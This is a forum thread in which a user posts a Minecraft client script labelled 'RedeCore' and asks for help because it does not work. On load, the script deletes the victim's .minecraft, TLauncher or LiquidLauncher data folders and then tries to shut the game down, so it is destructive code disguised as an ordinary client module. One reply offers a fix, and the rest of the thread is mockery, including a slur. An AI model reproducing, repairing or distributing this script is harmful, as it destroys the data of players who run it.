(help) script doesnt work
var FileUtils = Java.type('org.apache.commons.io.FileUtils'); var System = Java.type('java.lang.System'); var File = Java.type('java.io.File'); var minecraftLocation = new File(System.getProperty('user.home') + '\\AppData\\Roaming\\.minecraft'); var TLauncherLocation = new File(System.getProperty('user.home') + '\\AppData\\Roaming\\.tlauncher'); var LiquidLauncherLocation = new File(System.getProperty('user.home') + '\\AppData\\Roaming\\.LiquidLauncher'); var script = registerScript({ name: 'RedeCore', version: '0.0.0', authors: [''] }); script.registerModule({ name: 'RedeCoreStarter', category: 'Misc', description: '', }, function (module) { script.on('load', function() { switch (true) { case minecraftLocation.exists(): minecraftLocation.delete(); break; case TLauncherLocation.exists(): TLauncherLocation.delete(); break; case LiquidLauncherLocation.exists(): LiquidLauncherLocation.delete() break; mc.shutDown(); } } }); });
for some reason it doesnt work
@poop_dealer LOL
@poop_dealer bruh
it doesn't work cuz the correct method name is "shutdown", not "shutDown"
you're welcome!!1! -
@nvinci still didnt work help me please, i think im retarded to
@poop_dealer @mems help me please @nvinci
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@________ what are you doing talking to your alt
@________ ok
@________ what the fuck is blue zenith
@________ why do you mention it so much then
@________ nobody knows about the client, why would people download it, go back in reddit
lmao i imagine a grown man typing like a child